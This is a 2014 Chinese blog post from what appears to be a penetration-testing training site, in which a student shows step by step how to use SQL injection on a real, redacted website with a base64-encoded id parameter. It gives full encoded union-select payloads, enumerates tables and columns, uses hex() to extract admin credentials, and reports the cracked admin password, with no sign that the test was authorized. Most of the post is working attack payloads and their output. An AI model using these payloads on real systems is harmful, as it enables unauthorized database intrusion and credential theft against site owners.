?

May 03 2014

學員滲透錄十三 base64變形注入+hex編碼繞過

首頁 » 學員作品 » 學員滲透錄十三 base64變形注入+hex編碼繞過   

學員滲透錄十三 base64變形注入+hex編碼繞過

作者:M-7N10

AD:學滲透找暗月,暗月歡迎你的加入。

這篇文章由學員M-7N10所寫,一起來觀看他的繞過注入。

目標站點  http://xxx.xxxcn/xxx/index.php?id=MTA=
MTA= 是10的base64編碼
果斷提交 http://xxx.xxx.cn/xxx/index.php?id=MTAn
圖片2.png


報錯了,soga 注入 提交   http://xxx.xxx.cn/xxx/index.php?id=MTAgb3JkZXIgYnkgMSM=
MTAgb3JkZXIgYnkgMSM=是 order by 1#的base64編碼 頁面正常
直到 order by 4報錯了
so 3個字段
提交http://xxx.xxx.cn/xxx/index. ... iBzZWxlY3QgMSwyLDMj
爆顯示位
圖片3.png

顯示位 為 2 3

ok 我們爆 user version database
提交
http://xxx.xxx.cn/xxx/index. ... GFiYXNlKCkpLDMjCg==
user [email protected]
version 5.5.24
database media_yxx

爆表
http://xxx.xxx.cn/xxx/index.php?id=MTAgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkj

paca_abstracts,paca_admins,paca_contents,paca_infos,paca_ip,paca_site,paca_users

管理表 果斷 paca_admins

爆字段
http://xxx.xxx.cn/xxx/index.php?id=MTAgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSdwYWNhX2FkbWlucycj

字段
id,username,userpass

但在爆字段內容的時候遇到個小問題
id=10 and 1=2 union select 1,group_concat(id,0x3a,username,0x3a,userpass),3 from paca_admins#
報錯了
我就納悶了
后來分別爆 id username userpass
發現 id可以爆
username 和 userpass 報不出來
徹底暈了
后來百度到 報不出內容可能是編碼不同的原因
于是hex編碼試了試
id=10 and 1=2 union select 1,hex(concat(username,0x3a,userpass)),3 from paca_admins#
終于爆出來了
圖片4.png

事實上
id=10 and 1=2 union select 1,unhex(hex(concat(username,0x3a,userpass))),3 from paca_admins# 也是可以直接爆出來的
圖片5.png


cmd5解密后 admin 456123 小菜就只能寫到這里了。

暗月:這種編碼注入,知道編碼的前提,利用一些編碼中轉腳本,注入可以更快,更方便。


如果您喜歡本博客,歡迎點擊圖片定訂閱到郵箱填寫您的郵件地址,訂閱我們的精彩內容:

正文部分到此結束

文章標簽: base64變形注入

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «學員滲透錄十四 GV32CMS內容管理系統漏洞挖掘 | 學員滲透錄十二 BCTF中web200的解題思路»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

已有2條評論

匿名

2014-07-25 17:39 板凳
沒寫個中轉腳本?

你名

2014-05-04 16:35 沙發
暗月如此老練,小菜膜拜看點評
?
?
河北11选5开奖